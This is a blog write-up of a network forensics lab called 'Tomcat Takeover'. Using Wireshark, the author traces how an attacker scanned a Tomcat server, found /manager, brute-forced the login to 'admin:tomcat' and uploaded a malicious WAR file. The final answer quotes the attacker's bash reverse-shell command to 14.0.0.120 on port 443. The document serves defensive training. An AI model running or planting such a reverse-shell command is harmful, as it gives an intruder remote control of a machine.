Eugene Moore

/home

/posts

/about

Tomcat Takeover Lab

Network Forensics Lab (Wireshark)

- 4 min

Scenario

Our SOC team has detected suspicious activity on one of the web servers within the company’s intranet. In order to gain a deeper understanding of the situation, the team has captured network traffic for analysis. This pcap file potentially contains a series of malicious activities that have resulted in the compromise of the Apache Tomcat web server. We need to investigate this incident further.

Tools Used

  • WireShark

Question 1

Given the suspicious activity detected on the web server, the pcap analysis shows a series of requests across various ports, suggesting a potential scanning behavior. Can you identify the source IP address responsible for initiating these requests on our server?

  • This question is straightforward. Using Wireshark, the first thing I did was go to ‘Statistics > IPv4 Statistics’ and click on ‘All Addresses’.

  • In this section, you can notice two addresses that are most likely responsible for these requests. These addresses have the highest percentage of activity: 14.0.0.120 and 10.0.0.112.

images

  • Using the filter ip.src == 14.0.0.120 and examining the info section, we see that this IP address was trying to communicate with multiple ports on the server.

images

Answer: 14.0.0.120

Question 2

Based on the identified IP address associated with the attacker, can you ascertain the city from which the attacker’s activities originated?

  • Using Whois.com and the IP address identified in question 1, we can determine the attacker’s location.

images

Answer: Guangdong

Question 3

From the pcap analysis, multiple open ports were detected as a result of the attacker’s activitie scan. Which of these ports provides access to the web server admin panel?

  • Using the attacker’s IP address and examining the packets, port 8080 responded to the attacker’s request.

images

  • Following the TCP stream for that session, a GET request was sent by the attacker, and the server responded with an HTML file. Reading through this HTML document, we can see information indicating that this was the web server admin panel.

images

Answer: 8080

Question 4

Following the discovery of open ports on our server, it appears that the attacker attempted to enumerate and uncover directories and files on our web server. Which tools can you identify from the analysis that assisted the attacker in this enumeration process?

  • Using the filter ip.src == 14.0.0.120 and http, we examine successful HTTP requests to gather more information on the attacker’s techniques. In the packet details pane, we can see that the User-Agent is Gobuster. Gobuster is a tool used for directory and file enumeration on web servers.

images

Answer: gobuster

Question 5

Subsequent to their efforts to enumerate directories on our web server, the attacker made numerous requests trying to identify administrative interfaces. Which specific directory associated with the admin panel was the attacker able to uncover?

  • By examining the HTTP requests, we observe both successful GET and POST requests to the /manager directory.

images

Answer: /manager

Question 6

Upon accessing the admin panel, the attacker made attempts to brute-force the login credentials. From the data, can you identify the correct username and password combination that the attacker successfully used for authorization?

  • Using the filter http.authbasic or http.authorization , we can examine logins that include credentials. In Wireshark, setting the credentials tab as a column is the most straightforward way to solve this problem. This information is also included in the packet details pane under the Authorization section, which shows the credentials. The last login was the successful username and password.

images

Answer: admin:tomcat

Question 7

Once inside the admin panel, the attacker attempted to upload a file with the intent of establishing a reverse shell. Can you identify the name of this malicious file from the captured data?

  • Since the attacker uploaded a file, we can use the filter http.request.method == POST. By examining the POST requests and following the TCP stream, we can identify the filename, which is JXQOZY.war.

images

Answer: JXQOZY.war

Question 8

Upon successfully establishing a reverse shell on our server, the attacker aimed to ensure persistence on the compromised machine. From the analysis, can you determine the specific command they are scheduled to run to maintain their presence?

  • A reverse shell is a technique where the attacker establishes control over a compromised machine. Examining the network traffic, we know that the attacker used a POST request to upload the malicious file on the web server. Since the malware is on the victim server, the attacker must have a way to communicate with it, which is usually done by sending a GET request, as shown below:

images

  • This GET request allowed the attacker to establish a reverse shell. Examining the packets further and following the TCP stream on packet 20646, we find the commands the attacker executed to maintain presence:

images

Answer: /bin/bash -c ‘bash -i >& /dev/tcp/14.0.0.120/443 0>&1’